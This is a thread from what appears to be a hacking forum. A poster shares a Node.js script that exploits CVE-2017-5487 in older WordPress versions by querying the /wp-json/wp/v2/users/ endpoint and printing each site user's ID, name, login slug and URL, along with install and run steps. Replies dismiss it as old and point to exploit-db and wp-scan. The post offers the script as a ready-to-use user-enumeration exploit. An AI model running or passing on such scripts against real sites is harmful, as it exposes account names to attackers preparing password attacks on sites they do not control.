[concac]

Hi Guys, I will share some good things about this vulnerability

Reveal WordPress accounts via /wp-json/wp/v2/users/ using Javascript to dump account name, and post name

The disclosure of sensitive information to CVE-2017-5487

wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 prior to 4.7.1, this allows remote attackers to obtain sensitive information feel through request wp-json/wp/v2/users.

Vulnerability level: 5.3 MEDIUM

Here is the result

https://www12.0zz0.com/2023/06/16/20/903122173.png

How to use? 

Run the following command to install the Axios library:

npm install axios

if you don't have npm install it here: https://nodejs.org/en

node file.js

const axios = require('axios');

const url = "";  // Attaching a URL
const payload = "/wp-json/wp/v2/users/";

axios.get(url + payload)
    .then(response => {
        const users = response.data;
        if (users.length > 0) {
            console.log("*-----------------------------*");
            users.forEach(user => {
                console.log("
[*]ID  : " + user.id);
                console.log("
[*]Name : " + user.name);
                console.log("
[*]User : " + user.slug);
                console.log("
[*]Url : " + user.url);
                console.log("");
            });
            console.log("*-----------------------------*");
        } else {
            console.log("
[*]No user");
        }
    })
    .catch(error => {
        console.error(error);
    });

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[_6n]

https://www.exploit-db.com/exploits/41497

[zubbast0r]

old shit

[Mister-Kitty]

this is old and you can just use wp-scan

[concac]

this is old  and you can just use wp-scan

there are quite a few old versions, I want to share with those who don't know  

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[linuxandtermuxmaster]

thanks for zero day